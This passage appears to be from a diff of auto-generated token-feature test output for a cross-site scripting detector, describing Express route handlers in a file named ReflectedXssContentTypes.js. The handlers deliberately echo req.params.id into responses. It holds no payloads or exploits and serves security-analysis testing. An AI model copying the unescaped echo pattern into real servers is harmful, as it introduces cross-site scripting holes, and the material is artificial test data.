autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:55:35:55:59 | 'text/p ... t=utf8' | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:7 | res | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:11 | res.end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:11 | res.end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:11 | res.end | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:11 | res.end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:11 | res.end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | exceptional return of res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | exceptional return of res.end ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | exceptional return of res.end ... ams.id) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | exceptional return of res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | exceptional return of res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | res.end ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | res.end ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | res.end ... ams.id) | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | res.end ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:5:56:36 | res.end ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:9:56:11 | end | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:9:56:11 | end | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:9:56:11 | end | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:9:56:11 | end | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:9:56:11 | end | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:19 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.end | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20587,6 +136850,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:13:56:35 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:25 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:25 | req | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:25 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:32 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:32 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:32 | req.params | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:32 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:32 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:23:56:35 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:27:56:32 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:27:56:32 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:27:56:32 | params | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:27:56:32 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:27:56:32 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:34:56:35 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:34:56:35 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:34:56:35 | id | enclosingFunctionBody | req res err res header Content-Type textContentType res end FOO: req params id res setHeader Content-Type text/plain;charset=utf8 res end FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:34:56:35 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:56:34:56:35 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:3 | app | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:3 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:7 | app.get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:60:7 | app.get | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | app.get ... set.\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | app.get ... set.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | app.get ... set.\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | exceptional return of app.get ... set.\\n}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | exceptional return of app.get ... set.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:1:71:2 | exceptional return of app.get ... set.\\n}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:5:60:7 | get | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:5:60:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:5:60:7 | get | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | calleeImports | express | @@ -20594,6 +136898,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:9:60:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:60:21 | this | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:60:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:60:21 | this | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:60:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:60:21 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | 'arguments' object of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | exceptional return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | exceptional return of anonymous function | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | exceptional return of anonymous function | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | calleeImports | express | @@ -20601,6 +136920,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | functio ... set.\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | return of anonymous function | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | return of anonymous function | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:22:71:1 | return of anonymous function | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:32:60:34 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:60:37:60:39 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:61:7:61:9 | err | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:61:7:61:9 | err | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:61:7:61:9 | err | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:61:7:61:9 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:61:7:61:9 | err | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:7 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:17 | res.writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:17 | res.writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:17 | res.writeHead | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:17 | res.writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:17 | res.writeHead | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | exceptional return of res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | exceptional return of res.wri ... json'}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | exceptional return of res.wri ... json'}) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | exceptional return of res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | exceptional return of res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | res.wri ... json'}) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | res.wri ... json'}) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | res.wri ... json'}) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | res.wri ... json'}) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:5:62:60 | res.wri ... json'}) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:9:62:17 | writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:9:62:17 | writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:9:62:17 | writeHead | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:9:62:17 | writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:9:62:17 | writeHead | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:19:62:21 | 200 | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:19:62:21 | 200 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:19:62:21 | 200 | contextFunctionInterfaces | textContentType() | @@ -20617,6 +136991,21 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:24:62:59 | {'Conte ... /json'} | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:24:62:59 | {'Conte ... /json'} | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:24:62:59 | {'Conte ... /json'} | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:38 | 'Content-Type' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:38 | 'Content-Type' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:38 | 'Content-Type' | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:38 | 'Content-Type' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:38 | 'Content-Type' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:25:62:58 | 'Conten ... n/json' | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | InputAccessPathFromCallee | 1.Content-Type | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | InputArgumentIndex | 1 | @@ -20626,6 +137015,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:62:41:62:58 | 'application/json' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:7 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:7 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:7 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:12 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:12 | res.send | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:12 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | exceptional return of 